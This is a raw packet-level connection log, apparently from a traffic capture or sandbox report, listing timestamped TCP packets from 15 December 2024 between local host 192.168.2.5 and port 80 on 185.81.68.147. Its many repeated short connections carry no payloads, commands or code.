                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.312973022 CET4978980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.432739019 CET8049789185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.432805061 CET4978980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.552655935 CET8049789185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.743634939 CET8049789185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.743685961 CET8049789185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.743793011 CET4978980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.745130062 CET4978980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.849071980 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.864861965 CET8049789185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.969088078 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.971672058 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:45.971731901 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:46.091512918 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:46.091593027 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:46.211441994 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.424607038 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.424659967 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.424721956 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.425825119 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.536711931 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.545541048 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.656440973 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.658782959 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.658782959 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.778672934 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.779369116 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.899188042 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.104778051 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.105082989 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.105290890 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.106724977 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.215676069 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.226521969 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.335867882 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.336199999 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.339306116 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.459486961 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.459721088 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.579834938 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.951261044 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.951358080 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.951714993 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.953531027 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.068206072 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.076522112 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.189606905 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.189896107 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.189982891 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.310379982 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.310628891 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.431402922 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.646693945 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.646737099 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.646795034 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.648231983 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.755383015 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.767920971 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.875962973 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.876051903 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.876112938 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.995894909 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.995955944 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:53.115835905 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.501616955 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.501801968 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.501874924 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.503372908 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.614665031 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.623161077 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.734424114 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.734556913 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.734743118 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.854530096 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.854842901 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.975229025 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.181477070 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.181519032 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.181606054 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.182857990 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.286554098 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.302519083 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.407960892 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.408080101 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.408164024 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.528688908 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.528753042 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.648437023 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.879736900 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.879847050 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.879914999 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.883287907 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:57.989937067 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.003132105 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.109638929 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.109772921 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.109808922 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.229559898 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.229659081 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:58.349467993 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.572005987 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.572170973 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.572223902 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.574057102 CET4982880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.678531885 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.693749905 CET8049828185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.799061060 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.799216986 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.799293041 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.919109106 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:59.919336081 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:00.039046049 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.245629072 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.245750904 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.245795965 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.246995926 CET4983480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.349082947 CET4983980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.366642952 CET8049834185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.468820095 CET8049839185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.471570969 CET4983980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.471685886 CET4983980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.591444016 CET8049839185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.591506004 CET4983980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:01.711384058 CET8049839185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:02.926867008 CET8049839185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:02.927740097 CET8049839185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:02.927927017 CET4983980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:02.935899019 CET4983980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.042701006 CET4984180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.055567026 CET8049839185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.162432909 CET8049841185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.162597895 CET4984180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.162955999 CET4984180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.282660007 CET8049841185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.282857895 CET4984180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:03.402508974 CET8049841185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:04.771467924 CET8049841185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:04.771667957 CET8049841185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:04.771752119 CET4984180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:04.772733927 CET4984180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:04.880325079 CET4984780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:04.892390966 CET8049841185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.000241995 CET8049847185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.002696991 CET4984780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.002820015 CET4984780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.122468948 CET8049847185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.122658968 CET4984780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:05.242485046 CET8049847185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.460823059 CET8049847185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.461045027 CET8049847185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.461097956 CET4984780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.462274075 CET4984780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.567786932 CET4985380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.582261086 CET8049847185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.687808037 CET8049853185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.688219070 CET4985380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.688276052 CET4985380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.808305025 CET8049853185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.808378935 CET4985380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:06.928220987 CET8049853185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.304063082 CET8049853185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.304203987 CET8049853185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.304276943 CET4985380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.306200981 CET4985380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.411515951 CET4985980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.425929070 CET8049853185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.531399012 CET8049859185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.532661915 CET4985980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.533384085 CET4985980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.653198957 CET8049859185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.653465033 CET4985980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:08.773328066 CET8049859185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:09.989485025 CET8049859185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:09.989800930 CET8049859185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:09.989882946 CET4985980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:09.991029978 CET4985980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.099059105 CET4986480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.110842943 CET8049859185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.219100952 CET8049864185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.219204903 CET4986480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.219285965 CET4986480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.339260101 CET8049864185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.339353085 CET4986480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:10.459356070 CET8049864185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.655054092 CET8049864185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.655112028 CET8049864185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.655370951 CET4986480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.659300089 CET4986480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.770992041 CET4986680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.779052019 CET8049864185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.890845060 CET8049866185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.890934944 CET4986680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:11.890993118 CET4986680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:12.010802031 CET8049866185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:12.010981083 CET4986680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:12.130878925 CET8049866185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.353156090 CET8049866185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.353327036 CET8049866185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.353449106 CET4986680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.354620934 CET4986680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.458436966 CET4987280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.474313021 CET8049866185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.578237057 CET8049872185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.578624964 CET4987280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.578705072 CET4987280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.698388100 CET8049872185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.698465109 CET4987280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:13.818238020 CET8049872185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.025616884 CET8049872185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.025767088 CET8049872185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.025840044 CET4987280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.027513027 CET4987280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.130810022 CET4987880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.147270918 CET8049872185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.250751019 CET8049878185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.250860929 CET4987880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.250941038 CET4987880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.370743990 CET8049878185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.370851994 CET4987880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:15.491058111 CET8049878185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.727989912 CET8049878185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.728141069 CET8049878185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.728223085 CET4987880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.729207039 CET4987880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.833383083 CET4988380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.849004030 CET8049878185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.953188896 CET8049883185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.953286886 CET4988380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:16.953332901 CET4988380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:17.073231936 CET8049883185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:17.073338032 CET4988380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:17.193181038 CET8049883185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.567558050 CET8049883185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.567578077 CET8049883185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.567704916 CET4988380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.569331884 CET4988380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.679976940 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.689227104 CET8049883185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.800765991 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.800834894 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.800961971 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.922638893 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:18.922790051 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:19.046706915 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.256155968 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.256372929 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.256438971 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.257522106 CET4988580192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.364720106 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.377295017 CET8049885185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.484646082 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.484741926 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.484791040 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.604654074 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.604718924 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:20.725749016 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.121589899 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.121778965 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.121845007 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.123148918 CET4989180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.224011898 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.242846012 CET8049891185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.343873978 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.343952894 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.343995094 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.463809967 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.463862896 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:22.583653927 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.963820934 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.964061022 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.964157104 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:23.965009928 CET4989780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.067792892 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.084646940 CET8049897185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.187802076 CET8049898185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.187896013 CET4989880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:13:24.187975883 CET4989880192.168.2.5185.81.68.147
